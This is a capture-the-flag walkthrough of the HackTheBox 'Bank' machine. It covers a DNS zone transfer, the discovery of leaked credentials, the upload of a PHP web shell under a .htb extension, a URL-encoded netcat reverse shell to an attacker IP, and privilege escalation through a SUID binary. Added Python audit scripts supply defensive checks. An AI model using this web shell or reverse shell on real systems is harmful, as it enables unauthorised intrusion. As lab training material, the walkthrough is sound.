Bank
Nmap
nmap -p22,53,80 -sV -sC -T4 -Pn -oN bank-nmap bank.htb
Starting Nmap 7.93 ( https://nmap.org ) at 2023-08-12 03:56 +08
Nmap scan report for bank.htb (10.10.10.29)
Host is up (0.035s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 08eed030d545e459db4d54a8dc5cef15 (DSA)
| 2048 b8e015482d0df0f17333b78164084a91 (RSA)
| 256 a04c94d17b6ea8fd07fe11eb88d51665 (ECDSA)
|_ 256 2d794430c8bb5e8f07cf5b72efa16d67 (ED25519)
53/tcp open domain ISC BIND 9.9.5-3ubuntu0.14 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.9.5-3ubuntu0.14-Ubuntu
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
| http-title: HTB Bank - Login
|_Requested resource was login.php
|_http-server-header: Apache/2.4.7 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Open ports
Port 22 is open (SSH)
Port 53 is open (DNS)
Port 80 is open (HTTP)
Check for DNS Zone transfer
dig axfr bank.htb @10.10.10.29
; <<>> DiG 9.18.12-1-Debian <<>> axfr bank.htb @10.10.10.29
;; global options: +cmd
bank.htb. 604800 IN SOA bank.htb. chris.bank.htb. 5 604800 86400 2419200 604800
bank.htb. 604800 IN NS ns.bank.htb.
bank.htb. 604800 IN A 10.10.10.29
ns.bank.htb. 604800 IN A 10.10.10.29
www.bank.htb. 604800 IN CNAME bank.htb.
bank.htb. 604800 IN SOA bank.htb. chris.bank.htb. 5 604800 86400 2419200 604800
;; Query time: 43 msec
;; SERVER: 10.10.10.29#53(10.10.10.29) (TCP)
;; WHEN: Sat Aug 12 04:06:55 +08 2023
;; XFR size: 6 records (messages 1, bytes 171)
Subdomain Found
chris.bank.htb
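The transfer succeeds because the zone carries no allow-transfer restriction and BIND 9.9, the version fingerprinted above, allows transfers from any host by default. The audit below is an added example, not part of the original notes; it walks a named.conf text and reports every master zone whose effective allow-transfer list is open. The configuration fragment is constructed, not the box's.

```python
import re

# Constructed named.conf fragment (not the box's real configuration): the
# first zone repeats the open-transfer mistake seen above, the others show
# the two restricted forms.
SAMPLE_CONF = """
options { directory "/var/cache/bind"; };
zone "bank.htb" { type master; file "/etc/bind/db.bank.htb"; };
zone "internal.example" {
    type master; file "/etc/bind/db.internal";
    allow-transfer { 10.10.10.30; };
};
zone "locked.example" { type master; allow-transfer { none; }; };
"""

def _blocks(conf, keyword):
    """Yield (name, body) for each `keyword "name" { ... };` statement, matching braces."""
    for m in re.finditer(r'\b' + keyword + r'\s*(?:"([^"]*)")?\s*\{', conf):
        depth, i = 1, m.end()
        while i < len(conf) and depth:
            depth += {'{': 1, '}': -1}.get(conf[i], 0)
            i += 1
        yield m.group(1), conf[m.end():i - 1]

def _transfer_acl(body):
    """The allow-transfer address list of a block, or None if the block sets none."""
    m = re.search(r'allow-transfer\s*\{([^}]*)\}', body)
    return None if m is None else [t.strip() for t in m.group(1).split(';') if t.strip()]

def audit_zone_transfers(conf):
    """Map each master zone to ('OPEN' | 'RESTRICTED', effective allow-transfer list)."""
    global_acl = None
    for _, body in _blocks(conf, 'options'):
        global_acl = _transfer_acl(body)  # options{} sets the server-wide default
    results = {}
    for name, body in _blocks(conf, 'zone'):
        if not re.search(r'\btype\s+(master|primary)\s*;', body):
            continue  # slave/hint/forward zones hold no data of ours to leak
        acl = _transfer_acl(body)
        if acl is None:
            # BIND 9.9 default when nothing is configured: allow-transfer { any; }
            acl = global_acl if global_acl is not None else ['any']
        results[name] = ('OPEN' if 'any' in acl else 'RESTRICTED', acl)
    return results
```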
Web Directory Fuzzing
dirsearch -u http://bank.htb/
[03:56:20] 200 - 2KB - /assets/
[03:56:20] 301 - 304B - /assets -> http://bank.htb/assets/
[03:56:29] 200 - 1KB - /inc/
[03:56:29] 301 - 301B - /inc -> http://bank.htb/inc/
[03:56:29] 302 - 7KB - /index.php -> login.php
[03:56:30] 302 - 7KB - /index.php/login/ -> login.php
[03:56:31] 200 - 2KB - /login.php
[03:56:32] 302 - 0B - /logout.php -> index.php
[03:56:42] 302 - 3KB - /support.php -> login.php
[03:56:45] 301 - 305B - /uploads -> http://bank.htb/uploads/
Using medium dictionary
gobuster dir -u bank.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o bank-gobuster-2
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://bank.htb
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Timeout: 10s
===============================================================
2023/08/12 04:48:16 Starting gobuster in directory enumeration mode
===============================================================
/uploads (Status: 301) [Size: 305] [--> http://bank.htb/uploads/]
/assets (Status: 301) [Size: 304] [--> http://bank.htb/assets/]
/inc (Status: 301) [Size: 301] [--> http://bank.htb/inc/]
/balance-transfer (Status: 301) [Size: 314] [--> http://bank.htb/balance-transfer/]
Progress: 220552 / 220561 (100.00%)
===============================================================
2023/08/12 05:05:30 Finished
===============================================================
Directory Discovered
http://bank.htb/balance-transfer/
New subdomain fuzzing
gobuster dir -u http://chris.bank.htb -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://chris.bank.htb
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Timeout: 10s
===============================================================
2023/08/12 04:14:19 Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 11510]
Progress: 4541 / 4615 (98.40%)
===============================================================
2023/08/12 04:14:40 Finished
===============================================================
Filter by file size: nearly every .acc file in the listing is 581 or 582 bytes, so the single 257-byte file stands out
Index of /balance-transfer
[ICO] Name Last modified Size Description
[PARENTDIR] Parent Directory -
[ ] 68576f20e9732f1b2edc4df5b8533230.acc 2017-06-15 09:50 257
[ ] 09ed7588d1cd47ffca297cc7dac22c52.acc 2017-06-15 09:50 581
[ ] 941e55bed0cb8052e7015e7133a5b9c7.acc 2017-06-15 09:50 581
[ ] 0d64f03e84187359907569a43c83bddc.acc 2017-06-15 09:50 582
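Spotting the odd record by size is the whole trick of this step, and it generalises to any directory of supposedly uniform encrypted records. The script below is an added example, not from the original notes: it parses Apache autoindex rows (including K/M/G sizes, which the listing above does not use) and reports files that sit far from the median size. The sample rows are copied from the listing above and labelled as constructed input.

```python
import re
from statistics import median

# Constructed input: the first rows of the /balance-transfer/ autoindex shown
# above (the real listing has many more rows, nearly all 581-582 bytes).
LISTING = """\
[ICO] Name Last modified Size Description
[PARENTDIR] Parent Directory -
[ ] 68576f20e9732f1b2edc4df5b8533230.acc 2017-06-15 09:50 257
[ ] 09ed7588d1cd47ffca297cc7dac22c52.acc 2017-06-15 09:50 581
[ ] 941e55bed0cb8052e7015e7133a5b9c7.acc 2017-06-15 09:50 581
[ ] 0d64f03e84187359907569a43c83bddc.acc 2017-06-15 09:50 582
"""

# name, "YYYY-MM-DD HH:MM", size as autoindex prints it (257, 1.2K, 3.4M, ...)
ROW_RE = re.compile(r'(\S+)\s+\d{4}-\d{2}-\d{2} \d{2}:\d{2}\s+(\d+(?:\.\d+)?)([KMG]?)\s*$')
_UNITS = {'': 1, 'K': 1024, 'M': 1024 ** 2, 'G': 1024 ** 3}

def parse_listing(text):
    """Return [(name, size_in_bytes)] for file rows; header and parent rows do not match."""
    rows = []
    for line in text.splitlines():
        m = ROW_RE.search(line)
        if m:
            rows.append((m.group(1), int(float(m.group(2)) * _UNITS[m.group(3)])))
    return rows

def size_outliers(rows, tolerance=0.10):
    """Files whose size is more than `tolerance` (a fraction) away from the median size."""
    if not rows:
        return []
    med = median(size for _, size in rows)
    return [(name, size) for name, size in rows if abs(size - med) > tolerance * med]
```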
Curl the content
curl http://bank.htb/balance-transfer/68576f20e9732f1b2edc4df5b8533230.acc
--ERR ENCRYPT FAILED
+=================+
| HTB Bank Report |
+=================+
===UserAccount===
Full Name: Christos Christopoulos
Email: chris@bank.htb
Password: !##HTBB4nkP4ssw0rd!##
CreditCards: 5
Transactions: 39
Balance: 8842803 .
===UserAccount===
Obtained Credentials
Christos Christopoulos
chris@bank.htb : !##HTBB4nkP4ssw0rd!##
The support page (support.php) has a file upload function
Found in an HTML source comment: the .htb extension is executed as PHP
<!-- [DEBUG] I added the file extension .htb to execute as php for debugging purposes only [DEBUG] -->
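The root cause here is a handler mapping that treats .htb as PHP, combined with an uploads directory that still executes scripts. The check below is an added example, not the box's configuration or the author's code: it parses AddType/AddHandler lines and the <Directory> block for the upload path and assumes mod_php directives (php_admin_flag) are in use; the WEAK and FIXED fragments are constructed.

```python
import re

# Constructed vhost fragments (not the box's real configuration). WEAK reproduces
# the debug mistake from the HTML comment above; FIXED is the corrected form.
WEAK = """
DocumentRoot /var/www/bank
AddType application/x-httpd-php .php .htb
<Directory /var/www/bank/uploads>
    Options -Indexes
</Directory>
"""
FIXED = """
DocumentRoot /var/www/bank
AddType application/x-httpd-php .php
<Directory /var/www/bank/uploads>
    Options -Indexes
    php_admin_flag engine off
    RemoveHandler .php .htb
</Directory>
"""

def php_extensions(conf):
    """Every extension that an AddType/AddHandler line maps to a PHP handler."""
    exts = set()
    for m in re.finditer(r'^\s*Add(?:Type|Handler)\s+(\S+)\s+(.+?)\s*$', conf, re.M):
        if 'php' in m.group(1).lower():
            exts.update(e.lower() for e in m.group(2).split())
    return exts

def uploads_execute_php(conf, path):
    """True unless the <Directory> block for `path` switches PHP off or drops handlers."""
    m = re.search(r'<Directory\s+"?' + re.escape(path) + r'/?"?\s*>(.*?)</Directory>', conf, re.S)
    if m is None:
        return True  # no block at all: the directory inherits the vhost's PHP mappings
    off = r'php_admin_flag\s+engine\s+off|Remove(?:Handler|Type)\b|SetHandler\s+(?:default-handler|none)\b'
    return re.search(off, m.group(1), re.I) is None

def audit(conf, upload_dir, allowed=('.php',)):
    """Report PHP-executable extensions beyond `allowed` and whether uploads run PHP."""
    return {'extra_php_extensions': sorted(php_extensions(conf) - set(allowed)),
            'uploads_execute_php': uploads_execute_php(conf, upload_dir)}
```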
Send request in burpsuite
Content-Disposition: form-data; name="fileToUpload"; filename="cacert.htb"
Content-Type: application/x-www-form-urlencoded
<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>
Execute webshell
http://bank.htb/uploads/cacert.htb?cmd=whoami
Put Reverse Shell (Remember to URL encode)
rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7Csh%20-i%202%3E%261%7Cnc%2010.10.14.159%204567%20%3E%2Ftmp%2Ff
Find SUID files
sudo find / -type f -perm /4000
/var/htb/bin/emergency
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/bin/at
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/pkexec
/usr/bin/newgrp
/usr/bin/traceroute6.iputils
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/mtr
/usr/sbin/uuidd
/usr/sbin/pppd
/bin/ping
/bin/ping6
/bin/su
/bin/fusermount
/bin/mount
/bin/umount
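Every path in that list except /var/htb/bin/emergency is a stock package binary, and a custom SUID file under /var is what a host-integrity check should catch long before anyone runs it. The comparison below is an added example, not from the original notes: it classifies a host's SUID set against a baseline that is assumed to come from a known-good build of the same Ubuntu image (not from the host itself). The FOUND listing is a subset of the output above, and the baseline set is constructed.

```python
# Constructed inputs: a subset of the SUID listing above, and a baseline that is
# assumed to be taken from a known-good build of the same image (not from the host).
FOUND = """\
/var/htb/bin/emergency
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/passwd
/usr/bin/pkexec
/usr/bin/sudo
/usr/bin/mtr
/bin/ping
/bin/su
/bin/mount
"""
BASELINE = {
    "/usr/lib/openssh/ssh-keysign", "/usr/lib/dbus-1.0/dbus-daemon-launch-helper",
    "/usr/bin/passwd", "/usr/bin/pkexec", "/usr/bin/sudo", "/usr/bin/chsh",
    "/bin/ping", "/bin/su", "/bin/mount",
}
# Directories that package managers install SUID binaries into; anything
# else (e.g. /var, /tmp, /home, /opt) is hand-placed and gets top priority.
TRUSTED_PREFIXES = ("/bin/", "/sbin/", "/usr/bin/", "/usr/sbin/", "/usr/lib/")

def parse_find_output(text):
    """Paths from `find / -perm /4000` output; non-path lines (e.g. errors) are dropped."""
    return {line.strip() for line in text.splitlines() if line.strip().startswith("/")}

def classify_suid(found, baseline, trusted=TRUSTED_PREFIXES):
    """Compare a host's SUID set with the baseline.

    expected: in the baseline; unexpected: new binary in a package-managed directory;
    outside_trusted: new binary somewhere packages never install to; missing: gone.
    """
    report = {"expected": [], "unexpected": [], "outside_trusted": [], "missing": []}
    for path in sorted(found):
        if path in baseline:
            report["expected"].append(path)
        elif path.startswith(trusted):
            report["unexpected"].append(path)
        else:
            report["outside_trusted"].append(path)
    report["missing"] = sorted(baseline - found)
    return report
```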
Running /var/htb/bin/emergency
returns a # prompt, which indicates a root shell
# whoami
root